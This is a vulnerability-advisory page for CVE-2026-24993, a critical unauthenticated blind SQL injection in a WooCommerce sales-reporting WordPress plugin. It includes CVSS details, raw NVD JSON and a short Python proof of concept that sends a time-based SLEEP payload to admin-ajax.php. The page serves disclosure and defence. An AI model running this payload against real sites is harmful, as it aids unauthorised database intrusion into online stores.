Security Vulnerability Report
中文
CVE-2026-24993 CVSS 9.3 CRITICAL

CVE-2026-24993

Published: 2026-03-25 17:16:41
Last Modified: 2026-04-24 16:32:54

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPFactory Advanced WooCommerce Product Sales Reporting webd-woocommerce-advanced-reporting-statistics allows Blind SQL Injection.This issue affects Advanced WooCommerce Product Sales Reporting: from n/a through <= 4.1.3.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

WPFactory Advanced WooCommerce Product Sales Reporting <= 4.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_sqli(url): """ Proof of Concept for CVE-2026-24993 (Blind SQL Injection) This script sends a payload to check for time-based blind SQL injection. """ target = f"{url}/wp-admin/admin-ajax.php" # Payload to trigger a 5-second delay if the SQL query executes payload = { "action": "webd_report_stats", "product_id": "1' AND (SELECT SLEEP(5))-- -" } try: print(f"[+] Sending request to {target}...") response = requests.post(target, data=payload, timeout=10) # Check if the response time indicates a successful injection (delay > 5 seconds) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability Confirmed: The application responded with a delay.") else: print("[-] Vulnerability not detected or payload incorrect.") except requests.exceptions.Timeout: print("[+] Vulnerability Confirmed: Request timed out due to SLEEP(5).") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target_site = "http://example.com" # Replace with the target URL check_sqli(target_site)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24993", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:41.173", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPFactory Advanced WooCommerce Product Sales Reporting webd-woocommerce-advanced-reporting-statistics allows Blind SQL Injection.This issue affects Advanced WooCommerce Product Sales Reporting: from n/a through <= 4.1.3."}, {"lang": "es", "value": "Neutralización incorrecta de elementos especiales utilizados en un comando SQL ('inyección SQL') vulnerabilidad en WPFactory Advanced WooCommerce Product Sales Reporting webd-woocommerce-advanced-reporting-statistics permite inyección SQL ciega. Este problema afecta a Advanced WooCommerce Product Sales Reporting: desde n/d hasta &lt;= 4.1.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/webd-woocommerce-advanced-reporting-statistics/vulnerability/wordpress-advanced-woocommerce-product-sales-reporting-plugin-4-1-3-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}